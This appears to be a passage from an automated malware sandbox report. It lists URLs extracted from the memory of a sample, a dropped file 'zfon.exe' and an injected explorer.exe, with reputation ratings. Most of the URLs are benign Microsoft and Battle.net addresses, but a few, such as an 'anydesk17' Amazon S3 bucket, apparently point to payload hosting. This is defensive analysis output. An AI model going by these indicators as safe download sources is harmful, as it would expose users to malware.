                      https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/viexplorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://excel.office.comexplorer.exe, 0000000C.00000002.2053283744.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2025979008.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2126404678.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2123908196.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2125286461.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2137904772.000000000906A000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-bexplorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#nrGkqbCyKP.exefalse
                                high
                                http://schemas.microexplorer.exe, 0000000C.00000000.2021531603.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000002.2046017334.0000000002C80000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000002.2048244736.0000000007720000.00000002.00000001.00040000.00000000.sdmpfalse
                                  high
                                  https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://wns.windows.com/EM0explorer.exe, 0000000C.00000002.2053283744.000000000BDF5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2025979008.000000000BDF5000.00000004.00000001.00020000.00000000.sdmpfalse
                                      high
                                      https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINtexplorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                                        high
                                        https://nydus.battle.net/Bnet/client/purchase/jsutilnrGkqbCyKP.exe, 00000000.00000002.1995710016.0000000003991000.00000004.00000800.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000006.00000000.1991891496.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000007.00000000.1992853353.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000002.2174327948.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000000.2158519964.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000000.2172180259.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000002.2174271130.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe.0.drfalse
                                          high
                                          http://n.ad8jexplorer.exe, 0000000F.00000003.2065246181.0000000004B58000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://api.msn.com/v1/news/Feed/Windows?lexplorer.exe, 0000000F.00000003.2146195587.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2126404678.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2123908196.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2125286461.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2750262921.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2137904772.000000000906A000.00000004.00000020.00020000.00000000.sdmpfalse
                                            high
                                            https://anydesk17.s3.ap-east-1.amazonaws.com/(nrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002991000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                                              high
                                              http://s3-r-w.ap-east-1.amazonaws.comnrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002A72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://www.battle.net/shop/simplecheckout/errorzfon.exe, zfon.exe, 00000016.00000002.2174327948.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000000.2158519964.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000000.2172180259.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000002.2174271130.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe.0.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://ns.adoexplorer.exe, 0000000F.00000003.2065246181.0000000004B64000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zealexplorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-itexplorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      high
                                                      https://anydesk17.s3.ap-east-1.amazonaws.comHnrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.battle.net/shop/simplecheckout/debug-harnesszfon.exe, zfon.exe, 00000016.00000002.2174327948.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000000.2158519964.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000000.2172180259.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000002.2174271130.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe.0.drfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      https://www.battle.net/shop/simplecheckout/loadinghttps://www.battle.net/shop/simplecheckout/navbarhnrGkqbCyKP.exe, 00000000.00000002.1995710016.0000000003991000.00000004.00000800.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000006.00000000.1991891496.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000007.00000000.1992853353.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000002.2174327948.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000000.2158519964.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000000.2172180259.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000002.2174271130.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe.0.drfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://s3-r-w.ap-east-1.amazonaws.comdnrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002A72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://anydesk17.s3.ap-east-1.amazonaws.comnrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002A72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      unknown
                                                      http://www.microsoft.cexplorer.exe, 0000000C.00000000.2022719564.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2048969994.0000000009237000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        high
                                                        https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09explorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          high
                                                          http://anydesk17.s3.ap-east-1.amazonaws.comdnrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002A72000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          unknown
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namenrGkqbCyKP.exe, 00000000.00000002.1994835372.0000000002991000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://android.notify.windows.com/iOSdexplorer.exe, 0000000C.00000000.2025979008.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2053283744.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-alexplorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                high
                                                                https://sectigo.com/CPS0nrGkqbCyKP.exefalse
                                                                  high
                                                                  https://word.office.comexplorer.exe, 0000000F.00000003.2126404678.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2123908196.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2125286461.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2137904772.000000000906A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9kexplorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://ns.adobe.cexplorer.exe, 0000000F.00000003.2065246181.0000000004B64000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-darkexplorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://ns.adobeexplorer.exe, 0000000C.00000002.2046865328.0000000004405000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          unknown
                                                                          http://upx.sf.netAmcache.hve.11.drfalse
                                                                            high
                                                                            http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0snrGkqbCyKP.exefalse
                                                                              high
                                                                              https://powerpoint.office.comexplorer.exe, 0000000F.00000003.2123238140.000000000910A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2124445214.00000000090FE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://ns.adexplorer.exe, 0000000F.00000003.2065246181.0000000004B64000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  http://ns.adobeSexplorer.exe, 0000000C.00000000.2019785320.0000000004405000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://outlook.comexplorer.exe, 0000000C.00000002.2053283744.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2025979008.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2126404678.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2123908196.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2125286461.000000000906A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2137904772.000000000906A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://www.huya.com0nrGkqbCyKP.exefalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-darkexplorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&ocexplorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://www.battle.net/shop/simplecheckout/error?error=nrGkqbCyKP.exe, 00000000.00000002.1995710016.0000000003991000.00000004.00000800.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000006.00000000.1991891496.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000007.00000000.1992853353.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000002.2174327948.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000000.2158519964.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000000.2172180259.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000002.2174271130.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe.0.drfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://android.notify.windows.com/iOSexplorer.exe, 0000000C.00000000.2025979008.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2053283744.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://word.office.com48explorer.exe, 0000000C.00000002.2053283744.000000000BBB0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.2025979008.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        • Avira URL Cloud: safe
                                                                                        unknown
                                                                                        https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 0000000C.00000000.2025979008.000000000BC80000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2053283744.000000000BC80000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://nydus.battle.net/Pro/nrGkqbCyKP.exe, 00000000.00000002.1995710016.0000000003991000.00000004.00000800.00020000.00000000.sdmp, zfon.exe, 00000006.00000002.1996313483.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000006.00000000.1991891496.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000007.00000000.1992853353.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000007.00000002.2060015141.00007FF79D0EB000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000002.2174327948.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000016.00000000.2158519964.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000000.2172180259.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe, 00000019.00000002.2174271130.00007FF79D09A000.00000002.00000001.01000000.0000000A.sdmp, zfon.exe.0.drfalse
                                                                                              high
                                                                                              https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://api.msn.com/explorer.exe, 0000000C.00000000.2020477282.000000000702D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.000000000702D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2750262921.0000000008F1E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2146195587.0000000008F1E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2123363356.0000000008F79000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2137904772.0000000008F1E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBAexplorer.exe, 0000000C.00000000.2020477282.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2047375767.0000000006F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2079265800.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2064977051.000000000769D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000002.2747312781.0000000007684000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2057904876.00000000076A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000F.00000003.2156818481.0000000007696000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  • Avira URL Cloud: safe
                                                                                                  unknown
                                                                                                  http://ns.adobe.explorer.exe, 0000000F.00000003.2065246181.0000000004B64000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
